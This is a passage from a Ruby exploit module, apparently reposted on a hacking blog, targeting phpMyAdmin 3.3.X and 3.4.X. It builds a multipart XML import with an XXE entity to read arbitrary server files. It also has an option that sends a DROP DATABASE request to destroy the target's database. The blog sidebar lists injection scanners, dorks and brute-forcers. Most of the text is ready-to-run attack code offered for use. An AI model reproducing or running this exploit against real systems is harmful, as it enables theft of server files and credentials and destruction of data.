        if (getfiles.body.split("\n").grep(/== Dumping data for table/).empty?)
            print_error("Error reading the file... not enough privilege? login error?")
        else
            print_status("#{getfiles.body}")
        end
    end

    def dropdatabase(cookie,tokenvalue)
        dropdb = send_request_cgi({
            'uri'     => datastore['APP']+'/sql.php?sql_query=DROP+DATABASE+%60'+datastore['DB']+'%60&back=db_operations.php&goto=main.php&purge=1&token='+tokenvalue+'&is_js_confirmed=1&ajax_request=false',
            'method' => 'GET',
            'version' => '1.1',
            'headers' =>{
                    'Cookie' => cookie
                        },
            }, 25)

            print_status("Dropping database: "+datastore['DB'])
    end

    def run
        cookie,tokenvalue = loginprocess()

        print_status("Login at #{datastore['RHOST']}:#{datastore['RPORT']}#{datastore['APP']} using #{datastore['USER']}:#{datastore['PASS']}")

        craftedXML = "------WebKitFormBoundary3XPL01T\n"
        craftedXML << "Content-Disposition: form-data; name=\"token\"\n\n"
        craftedXML << tokenvalue+"\n"
        craftedXML << "------WebKitFormBoundary3XPL01T\n"
        craftedXML << "Content-Disposition: form-data; name=\"import_type\"\n\n"
        craftedXML << "server\n"
        craftedXML << "------WebKitFormBoundary3XPL01T\n"
        craftedXML << "Content-Disposition: form-data; name=\"import_file\"; filename=\"exploit.xml\"\n"
        craftedXML << "Content-Type: text/xml\n\n"
        craftedXML << "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n"
        craftedXML << "<!DOCTYPE ficheiro [ \n"
        craftedXML << " <!ENTITY conteudo SYSTEM \"file:///#{datastore['FILE']}\" >]>\n"
        craftedXML << "<pma_xml_export version=\"1.0\" xmlns:pma=\"http://www.phpmyadmin.net/some_doc_url/\">\n"
        craftedXML << "    <pma:structure_schemas>\n"
        craftedXML << "        <pma:database name=\""+datastore['DB']+"\" collation=\"utf8_general_ci\" charset=\"utf8\">\n"
        craftedXML << "            <pma:table name=\""+datastore['TBL']+"\">\n"
        craftedXML << "                CREATE TABLE `"+datastore['TBL']+"` (`file` varchar(20000) NOT NULL);\n"
        craftedXML << "            </pma:table>\n"
        craftedXML << "        </pma:database>\n"
        craftedXML << "    </pma:structure_schemas>\n"
        craftedXML << "    <database name=\""+datastore['DB']+"\">\n"
        craftedXML << "        <table name=\""+datastore['TBL']+"\">\n"
        craftedXML << "            <column name=\"file\">&conteudo;</column>\n"
        craftedXML << "        </table>\n"
        craftedXML << "    </database>\n"
        craftedXML << "</pma_xml_export>\n\n"
        craftedXML << "------WebKitFormBoundary3XPL01T\n"
        craftedXML << "Content-Disposition: form-data; name=\"format\"\n\n"
        craftedXML << "xml\n"
        craftedXML << "------WebKitFormBoundary3XPL01T\n"
        craftedXML << "Content-Disposition: form-data; name=\"csv_terminated\"\n\n"
        craftedXML << ",\n\n"
        craftedXML << "------WebKitFormBoundary3XPL01T--"


        print_status("Grabbing that #{datastore['FILE']} you want...")
        res = send_request_cgi({
            'uri'     => datastore['APP']+'/import.php',
            'method' => 'POST',
            'version' => '1.1',
            'headers' =>{
                    'Content-Type' => 'multipart/form-data; boundary=----WebKitFormBoundary3XPL01T',
                    'Cookie' => cookie
                        },
            'data'    => craftedXML
        }, 25)

        readfile(cookie,tokenvalue)

        if (datastore['DROP'] == "true")
            dropdatabase(cookie,tokenvalue)
        else
            print_status("Database was not dropped: "+datastore['DB'])
        end

    end
end

Ilyas Cyber4rt

TOP GOOGLE DORK

mysql injection TUT

Remote File Inclusion Scanner

Viper LFI Scanner Ver. 3.0

MySQL Injection Dumper GUI

PHP Admin Finder

MD5 MySQL Brute Forcer

Joomla Component (com_dshop) SQL Injection Vulnerability

phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via XXE Injection

SITE INFO

Total Pageviews

Archives

Followers